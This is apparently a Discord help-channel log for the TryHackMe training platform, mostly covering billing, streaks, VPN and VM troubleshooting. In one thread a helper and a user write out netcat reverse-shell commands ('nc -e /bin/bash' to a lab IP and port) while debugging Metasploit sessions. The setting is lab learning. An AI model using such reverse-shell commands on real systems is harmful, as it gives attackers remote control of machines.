these urls are blocked in uae

#

@hollow otter thanks 🙂

scenic torrentBOT
#

Gave +1 Rep to @hollow otter

cobalt grove
#

I'd like to subscribe to THM. I am a student, but registered with my private mail. I've changed the mail to my university mail and verified it. But it doesn't show the discount. Do I have to create a new account with my student mail as it needs to be the mail I registered with? Or should I directly write a mail to support and tell them that my university address seems not to be recognised (it does not end with .edu or .ac.uk)

crystal marlin
bronze vale
#

I work from 7pm-10pm GMT

silver scarab
#

hey guys, I'm having a problem connecting the nmap Walkthroughs (same problem as free guest and vip) Problem is i cant reach the machine with ping or nmap. I tried with openvpn, web based kali and attackbox. Same result. Im connected, I renewed the opvn configuration file, restarted machine, killed opvn instances, terminate and start machine again... but no result. But i can paste the machine ip in browser and i get the ISS home page... any advice?

#

I've checked and i have the tun0 interface and opvn runs fine (Initialization Sequence Completed)

abstract raven
silver scarab
abstract raven
#

Can you send the link to the room?

silver scarab
#

which link?

#

oh wait

#

i think ill have same problem with any machinne

abstract raven
#

What task are you up to?

silver scarab
#

task 14 practical

#

i just need to do some nmap scans

abstract raven
#

The machine isn't supposed to respond to pings

#

You should have learned a way to get around that in a previous tadk

#

Task

silver scarab
#

i know doesnt respond icmp

#

but same problem with nmap

#

host seems to be down

abstract raven
#

Nmap by default does a ping scan to determine if the host is Up. Theres a specific flag you need to use to skip the ping scan

silver scarab
#

i tried the xmas scan too

abstract raven
#

That's not it lol

#

You need to skip the ping scan

#

Re read task 13

silver scarab
#

you mean -Pn switch?

abstract raven
#

Well that does do what you need it to dosent it?

silver scarab
#

according what i read on task 13 i used nmap -sX -p1-999 10.10.149.220 -Pn -vv

#

sX for xmas nmap, -p to ports from 1 to 999 and -Pn to not do pings... -vv for verbose

abstract raven
#

Well, an Xmas scan will show lots and lots of open or filtered ports

#

You'll need to use something you learned in an earlier task

silver scarab
#

then i guess everything is working fine and its my mistake

#

so i need to re read previous tasks

abstract raven
#

Yep

silver scarab
#

thanks for your help Joker122402

#

🙂

lunar tree
#

Hello, am I able to change my username on THM ?

scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

fading saddle
#

hey fellas, can I enroll in multiple paths after completing the current one? also can i get more than one certificate of completions?

sand olive
#

Yes and yes (1 per path)

fading saddle
scenic torrentBOT
#

Gave +1 Rep to @sand olive

naive dust
#

Hello, Who can help me with changing my country?
Thansk,

sand olive
#

It's one of the top ones

naive dust
#

Thanks

hollow yew
#

https://tryhackme.com/room/internal

On this machine, when on the http server when i click something instead of taking me to where i clicked it changes the url to "internal.thm"/path i want to go

is this intentional or what lmaoo

hollow yew
#

oh

#

pain

#

ty for help astro_thanks

sand olive
#

Edited because am a potato

#

@hollow yew ^

hollow yew
#

oh shit

#

thats mad

#

tysm

sand olive
hollow yew
runic barn
#

hi guys. I open with firefox the webpage from any practical room and nothing is displayed, but i can see and analyze the source code and the developers tool. Why is that? any missconfiguration? i tried firefox, chrome and ie...

runic barn
#

pickle rick

#

for example, but happens in everyone

crystal marlin
#

And what do you see then?

#

Maybe supply a screenshot

runic barn
#

nothing. white screen

#

but i can open source code and watch developers tool

#

thats weird

#

white screen, reloading anytime

crystal marlin
#

Are you using a private vpn provider?

runic barn
#

the vpn that offers tryhackme

crystal marlin
#

You don't have to use the vpn just for going on the usual webpage/room page. Have you tried ctrl + F5 for a hard refresh?

runic barn
#

y

crystal marlin
#

In case you have the vpn turned on, could you turn it off and try again?

runic barn
#

i will

#

same

crystal marlin
runic barn
#

i discover what a vpn is last month because of tryhackme

#

😄

crystal marlin
runic barn
#

tried in window os installed, and from kali VM

#

both

#

they do the same

#

is it probably that my router is connected through a vpn?

crystal marlin
#

Mh, maybe try restarting your computer and try again without connecting to the VPN for now.

#

Also maybe check if you have any kind of anti virus that might block something in your browser.

runic barn
#

i will disable the av and try again

#

ty anyway fontaene

crystal marlin
muted oxide
#

hi are those windows machine always that slow or is it because of subscription? 😄

lyric lake
#

I am needing assistance with Metasploit. I noticed I was not getting any response back to my exploits, so I went backwards and restarted the Metasploit Room. For some reason, the same issue occurs, except it shows me this time that the exploit was run but no session was created. Can someone work with me on this and help me pinpoint my issue?

crystal marlin
lyric lake
#

Attackbox works, but my machine is the one throwing the error.

crystal marlin
lyric lake
#

Actually, any room that requires connecting with Metasploit is not returning a connection. Metasploit room, Ice room, Blaster room, and rooms in Jr Pentester path. First time I went thru the Metasploit room, it worked fine.

crystal marlin
lyric lake
#

Installed Kali

crystal marlin
crystal marlin
lyric lake
crystal marlin
#

Try sudo ifconfig tun0 mtu 1200 and check again if you receive the shell. Maybe don't try it for now with an exploit like eternalblue which might can fail several times.

lyric lake
lyric lake
crystal marlin
crystal marlin
lyric lake
crystal marlin
#

I'm not quite sure, but I think someone said once that the icecast exploit could mess up the machine after a certain amount of attempts. So maybe restart the target machine, give it enough time to fully boot and then try it again with the mtu set to 1200. Also you might want to try to just catch a simple shell with netcat or metaploit from a target machine where you can ssh into (for example linux fundamentals 2). Just to make sure you can receive rev shells in general.

lyric lake
crystal marlin
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

naive dust
#

Hi, I am unable to subscribe to THM premium because I'm getting a 'cannot access your paypal account' during the checkout process. Can someone help?

vocal wigeon
#

Hi, seems like there's a bug(?) on the Offsec pentesting path? I've completed all of it yet I'm still at 80% progress because of the HackPark room even though I completed the room itself

unique kelp
#

hey, i need help on the billing account settings

#

@zealous yoke

naive dust
#

Hello, what should be the Network setting on my Virtual Box with Kali Linux so it does not interfere with my ISP or the Law? Thanks for your help.

plush bay
#

depends on where you live and what isp you are using

#

but most of the time the defaults should probably be okay

abstract raven
naive dust
#

I am going to work only with my own VM's in the Virtual Box.

abstract raven
#

Then don't worry about the network settings

#

NAT will be just fine which is default. If you want to cut them off from the internet too then switch the adapter to host only

coral granite
#

I have enabled One day streak freeze. Hovering my streak says that 1 day freeze is applied. Does this mean that i can leave for a day without completing questions and it will not cancel my streak right?

coral granite
crystal marlin
covert bronze
#

I kinda have a problem with the room "Agent Sudo" (https://tryhackme.com/room/agentsudoctf) the box takes ages for me to spin up. (And its a linux box) Afterwards it works and is interactive for like 3-4 minutes then it is not responsible for 1-2 minutes. This repeats over and over again. I already restarted the box twice

crystal marlin
covert bronze
#

It is completely unresponsive not even reacting to pings

urban wraith
#

I am trying to connect my virtualbox(os kali) to thm but it doesn't seem to be working.

#

Exiting due to fatal error

#

I have solved it with black magic

#

thanks anyone who read this

crystal marlin
# covert bronze Sorry I meant inactive

Well I still don't understand completely? I guess you are at task 1 or 2 ? So have you tried to scan that machine already? Also, are you trying to access that target machine from the attackbox or your own machine?

crystal marlin
urban wraith
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

covert bronze
#

I am trying to access it from my own kali vm but I never had a problem with any machine I encountered on thm, yet.

crystal marlin
# covert bronze The problem is the machine the room is hosted on runs instable. The target machi...

That sounds more like a connection issue then the machine itself. Check if you are successfully connected to the THM VPN by browsing to 10.10.10.10 or doing curl 10.10.10.10/whoami Make sure openvpn is running directly inside your VM and not on your host machine. Check ifconfig to make sure there is only a tun0 interface and not any extra like tun1, tun2 etc. If you have done that and all seems good, try sudo ifconfig tun0 mtu 1200 and then try again to SSH, or ftp.

covert bronze
#

I will check it out tomorrow thank you for the information. I still have to escalate to root so I will get to this box tomorrow and then I can rule out the the problem is on my connection side if it is still present 🙂 Gn8 for today

crystal marlin
#

Alright, gn8 😴

obsidian orchid
#

Does tryhackme automatically takes money if I've subscription and I haven't canceled it before renew date??

#

My subscription was supposed to end on 22/11/2021 but I can still access vip machines. I don't want subscription this month.

#

If i cancel subscription will my money (if taken) be returned

last dagger
#

Hi all, for some reason my profile now says that I am from Afghanistan and I show up on the Afghanistan leaderboard when I am actually from Australia. My account used to to show up correctly with the Australian Flag. Any way I can change this or get it updated?

hollow otter
inland seal
#

Hey!
Is there a way i can gift 1 yr subscription to my friend and use the code AOC2021 to get the discount?

last dagger
scenic torrentBOT
#

Gave +1 Rep to @hollow otter

naive dust
#

Hey guys wassup! I have a question, does anyone know why when i am connected to the vpn thm via mobile tethering i dont get rev shells? Thanks!

weary elbow
#

Yesterday I was busy because of some work
And to keep my streak going on I just answered 1 question which was enough to keep my streak going on.
So I just answered 1 question and it even displayed that streak has been increased, but when I opened today it's showing me that all streak is gone now I have to start again from 0.

Why so 😔

gaunt burrow
#

Is it just my or the images in the rooms are broken?

bronze vale
#

Which rooms?

#

Could you screenshot?

sacred gull
#

I just lost my 60 day streak is there anyway to get it back? 😔

scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

lyric lake
#

I have an issue for everyone to ponder over. I have had no luck with sessions connecting in Metasploit. I have discovered that I am not able to connect with NC either. It states that there are no ports to connect to. I then ran nmap on my THM VPN address and my personal network address; both came back with NO open ports at all. Can anyone explain why this could be?

lament trout
#

what's the point of checking open ports on your own device?

#

unless you're running a server or something

lyric lake
#

I just tried it because I couldn't get a reverse shell using Netcat

#

Netcat told me no ports to connect to, when I tried to connect from target machine. This gives me an idea why my listeners never got responses.

crystal marlin
lyric lake
crystal marlin
lyric lake
#

they both appear to be waiting on something

crystal marlin
lyric lake
#

no....just sitting there waiting on both sides

#

ok, now the connection timed out

crystal marlin
#

Have you set the mtu setting I gave you last time?

lyric lake
#

yes

crystal marlin
# lyric lake yes

So after it said connection received, did you try a command like whoami?

lyric lake
#

it never said connection received

#

"shell@linux-shell-practice:~$ nc -e /bin.bash 10.2.102.61 4444
(UNKNOWN) [10.2.102.61] 4444 (?) : Connection timed out
"

#

Listener is still waiting

lament trout
#

there's another NC command as well, maybe you can tey that

crystal marlin
lament trout
lyric lake
crystal marlin
crystal marlin
#

Mh

crystal marlin
# lyric lake 10.2.102.61

On the target machine, could you try nc -e /bin/bash 10.9.189.199 4242 to make sure there is no issue within the target machine.

#

That's my listener.

crystal marlin
#

Ok, got it.

#

And I might repeat myself, but your listener was started with nc -lnvp 4444, right ?

lyric lake
crystal marlin
#

Ye, that should make no difference so that seems fine. Could you show me your ifconfig output?

lyric lake
#

I have to figure out how to screenshot this thing

crystal marlin
lament trout
#

quick question, with the THM VPN - we are all basically connected to each other right?

shy thorn
#

same subnet pretty much

lyric lake
#

there ya go

lament trout
#

and is there anything stopping anyone from unethically pentest someone's IP?

crystal marlin
#

Try that pls.

shy thorn
shy thorn
runic wave
#

Did THM remove the "windows" or "linux" sort buttons from the learn >> search page?

lyric lake
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

lyric lake
#

mtu 1500 works again

crystal marlin
#

Great, then you should be good to go now I guess 🙂

lyric lake
crystal marlin
lyric lake
#

Maybe I can finish the Jr Pentest path now

#

This has been a problem for over a month now. Hehe

naive dust
#

Does anyone know the reason why i can't change my country? Actually i didn't change my country however i saw this morning that it has been changed.

lyric lake
cyan niche
#

Hey guys. I have been using VMware workstation for my linux machines the last month but my license expired, can anyone recommend free alts?

#

I thought VMware was free, maybe it is and i have wrong version

lament trout
#

@cyan niche you're probably on vmware workstation pro, try vmware workstation player, that's free I believe.

scenic torrentBOT
#

Gave +1 Rep to @lament trout

vale vine
#

hey is the attackbox provided from tryhackme really slow right now ? cause i am trying to use them and the vnc is giving me like 1 fps .

#

and my internet connection seems fine everything else is working well its just the attackbox which working slow

mellow mulch
#

I was trying to connect to the Machine from https://tryhackme.com/room/django several times through openvpn and out of the attackbox but even after 10 minutes and serveral attempts of rebooting the Machine i cant reach it.

snow vapor
#

Please I'm totally lost in owasp top 10, task 26 with flag.txt

muted oxide
#

which one you dont know

#

you have to generate encoded oaykiad and use pickle i python

#

john

plush bay
#

use jumbo john and use zip2john to make a file john can understand to crack the password for

plush bay
crystal marlin
snow vapor
plush bay
#

shadow is guessing at least

#

the file is not encrypted... the zip file is

#

encrypted zip files lets you view what files are on the inside but not view the contents of said files without using the password to decrypt and extract

scenic torrentBOT
#

Gave +1 Rep to @plush bay

plush bay
#

no problem... hope you can crack it easily enough

earnest herald
#

Hi

mellow mulch
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

crystal marlin
mellow mulch
#

i tried it a third time and it was still not possible. i'll try it later again

crystal marlin
mellow mulch
crystal marlin
mellow mulch
#

so first i tried browser, second ssh

crystal marlin
mellow mulch
#

y

crystal marlin
#

K, ye in case you try it again and it's still failing you can ping me here. As I assume you are busy with Hunt right now 😄

sand olive
#

humms showdown music

mellow mulch
warped sequoia
#

Haven't gotten a response to a ticket in 24 hours, not from THM or PortSwigger.... having some pretty serious issues with ssh login since doing the BurpSuite room - disabled FoxyProxy today... port 22 wasn't showing as open anywhere, finally reset a bunch of things and get it now, but still no password is ever accepted for ssh login

crystal marlin
warped sequoia
#

The issue is showing in all rooms now, but the original BS room (love that acronym for it now...) was The Basics. FoxyProxy sent it all to hell, and nothing's been working properly since...

crystal marlin
warped sequoia
#

No... ALL rooms ... password fails... I went to a lot of trouble just to be able to get an open port 22 again.. it wasn't showing as open anywhere... found two random threads that helped me a little... now password still isn't being accepted. This happens across ALL rooms

crystal marlin
warped sequoia
#

So, let's say Vulnversity... I'm not getting any access to the machine through browser, ssh, or otherwise... I'm also not asked to gain access any other way in the module... so... ? Why can't I access anything. I figured I needed to ssh to the room

#

Some of these modules really offer zero instruction, and if you're not subscribed to a path... I mean, I'm starting to think I need to take a proper online course... THM seems to be all over the place with no real track to progress, so I don't know what I'm supposed to be doing otherwise if it gives me no info to work with...

crystal marlin
warped sequoia
#

No, VirtualBox running Kali

#

OpenVPN. It connects just fine.

crystal marlin
warped sequoia
#

I've done that... I've used the site a bit already, but thank you

crystal marlin
warped sequoia
#

Okay, give me a moment, I closed everything out from frustration of nothing working. You said no ssh in BS room, though, so is that the best place to test this?

crystal marlin
warped sequoia
#

No, that was the room I did before I started having trouble everywhere else... if that's where you want me to go, though, that's what I'll do

crystal marlin
warped sequoia
#

Thanks, one minute, just getting connected again

crystal marlin
warped sequoia
#

I'm on the gobuster task. In the walkthrough, DarkSec connects to the address in his browser to show that's where the upload form is. I can't connect to anything at the machine's IP address.

crystal marlin
#

Okay, so can you open 10.10.10.10 in your VMs browser?

warped sequoia
#

Jon suggested I come here, because originally this was a matter of having no port 22 ever showing up... I SEEM to have gotten around that, but still having connection issues, it seems...

One moment...

#

Yep, that connected

crystal marlin
warped sequoia
#

wtf... I just entered it myself, and it connected.... psshhhh

#

IP:3333/internal for the internal folder gobuster found

#

shit... well... weird

crystal marlin
#

At least it seems you are not having connection issues, just the confusion about the ssh part 🙂

warped sequoia
#

So to be clear, we are not meant to be able to ssh into all rooms unless specifically instructed? I guess I thought it was standard to connect to each room's machine that way, because in early rooms, it is treated as standard fare...

crystal marlin
warped sequoia
#

I guess it concerns me when the password is constantly rejected, and Jon mentioned bringing that here... I don't want to be condescended over "confusion," I have been doing as I've done in all other rooms, with no information anywhere to suggest different

#

Crap, now the room wants me to use BurpSuite, which seemed to kick off all my proxy misconfigurations...

crystal marlin
warped sequoia
#

Well, I certainly appreciate your time and help! At least I feel better about this, hopefully PortSwigger will get back to that ticket so I can use BurpSuite without it screwing up other things.... Thank you!

crystal marlin
dense matrix
#

hello, I'm on network services 2 and I'm starting the NFS section 3: Enumerating NFS, where I need to mount some shares. I've mounted the shares, but there's no folders inside. Apparently, I need to find some keys that give me access to a remote server but there's nothing in the single folder. Can anyone please help?

naive dust
#

anyone decent with tor ?

shy jungle
cedar drum
#

hey so this isn't too important honestly

#

but the thingy that tells u how many questions you've answered in a day and displays ur streak isn't working

#

it's saying I haven't answered a single question today when I've completed multiple rooms today

cedar drum
#

I have

#

multiple times

#

ima log out and log back in

#

still says I did nothing, hm

gaunt burrow
naive dust
#

So for some reason I am now able to deploy an attackbox... It says that I have used it for over an hour, but I haven't even open it it for 15 mins..
Is this some weird glitch?

lament trout
#

@naive dust you can only start the attackbox once a day

#

-unless you're subscribed

naive dust
#

Oh dang... That sucks

inland seal
#

Hey!
Is there a way I can gift 1 yr subscription to my friend and use the code AOC2021 to get the discount?

bronze vale
somber oxide
#

anyone knows how to generate new tryhackme token for discord? I created this new discord account and now trying to reconnect it. my old discord got deleted already by the discord moderators

velvet grail
#

hello, Is not a big issue but It look like I'm not able to configure the country on my profile, it always go back to the first country of the list Afganistan

hollow otter
velvet grail
#

it goes to the dashboard

hollow otter
#

Check your country again

#

I've read use those link to fix this problem

velvet grail
#

ohh, I got it now, yes it worked

#

thanks!

naive dust
#

Hi guys, I'm trying to connect to openvpn on kali linux, however I can't get on, I get the error

Options error: In [CMD-LINE]:1: Error opening configuration file: /Downloads/IrScrubzz(1).ovpn
Use --help for more information.

crystal marlin
#

Could you change into the Downloads folder and do pwd ?

naive dust
#

/home/kali/Downloads

#

I should put all that in?

crystal marlin
#

Yes so the path would be /home/kali/Downloads/IrScrubzz(1).ovpn

naive dust
#

Thank you, that worked.

sterile pulsar
#

How To I Am Test my Web Host Security ? IS There Anyone Try to hit my target To i Am Check My Web SEcurity

cedar drum
#

Where do I change my country?

naive dust
#

I'm using Parrot inside of a VM (Virtual Box), every time I shut down the machine it resets my resolution to 800x600. Is there a fix for this? Not a massive issue but causes a lot of lag when I login

naive dust
#

Hey i can't download my OpenVPN file for the network wreath

#

It redirect me on the page :

naive dust
#

Need some help here. I'm unable to connect to my OpenVPN Profile.

#

It shows - Error message: ovpnagent: request error

outer maple
#

hello cant seem to reset upload

#

I cancelled the upload now I cant do it again

#

theres a typo BTW

crystal marlin
naive dust
crystal marlin
naive dust
outer maple
crystal marlin
# naive dust Sure!

Oh you are not on linux? Mh, I have never used it outside of linux, so I'm not sure if there is some kind of log or similar to check on what the issue is.

naive dust
#

Anyways, thanks for your response! @crystal marlin

scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

crystal marlin
lament trout
#

@naive dust is parrot supported for VM?

#

oh, so they do have OVA file now, I remember using the ISO and having similar issues in VM, are you using OVA? @naive dust

warped sequoia
#

Hi... Ice Room... Task 4... only getting one vulnerability showing running post/local/recon/multi_exploit_suggester - walkthrough shows 31! The one I'm getting is not the one appropriate for the Task either.... I have a screenshot from last night, and another from today... resetting everything didn't help either

Only thing I've newly noticed is that all walkthroughs are using msf5, I have msf6 (just downloaded latest version, of course). Maybe the module needs to be updated for the newest version of Metasploit? Or I am actually expected to downgrade just to complete the Room?

dense matrix
scenic torrentBOT
#

Gave +1 Rep to @shy jungle

crystal marlin
lament trout
#

kali ftw

main rampart
#

When trying to start the machine I can't see the public IP. Terminating the machine and restarting it didn't help

#

Does anyone know what the problem might be?

crystal marlin
main rampart
#

Kali

crystal marlin
# main rampart Kali

Okay, so one of the web based attacking machines? But what are you trying to do with that IP ?

main rampart
#

Yes, for the remote desktop

crystal marlin
# main rampart Yes, for the remote desktop

Ah okay. Well as far as I know there is no public IP to access them, maybe someone else will prove me wrong. But you most probably have to connect to the THM VPN and go with the private IP to connect to it.

main rampart
#

Okay

crystal marlin
# main rampart Okay

But just to let you know, you can also just use these web based machines within your browser. Also putting them on full screen.

turbid glacier
#

Hi guys.
I'm running kali on a VM and my openvpn suddenly stopped working yesterday. I've downloaded new config files but I keep getting the same error :

#

oh derp

#

I wasn't running as sudo

warped sequoia
# crystal marlin You can just use the attackbox to have msf5 for that task, or grab the answer fr...

Well... you need to use the exploit then... I mean, I guess I can use the AttackBox, but that's more of a workaround.... the modules should really reflect current tools, don't you think? I've seen other threads online about differences in msf5 and msf6, so there may very well be other Rooms affected as well. It would be a suggestion to the site devs to update modules to reflect usage of current versions of the tools they're asking us to use... would seem to be appropriate

#

And of course, now I'm being told I need to subscribe, because I had to use the Attackbox earlier for another workaround... modules should really be updated, or at least contain notes about the versions of tools they require...

crystal marlin
quick bear
#

hmm for some reason I can't ping my machine for network services 2, works perfectly through attackbox, but fails from a local kali vm

mellow kelp
quick bear
#

yeah

mellow kelp
#

can you send some screenshots?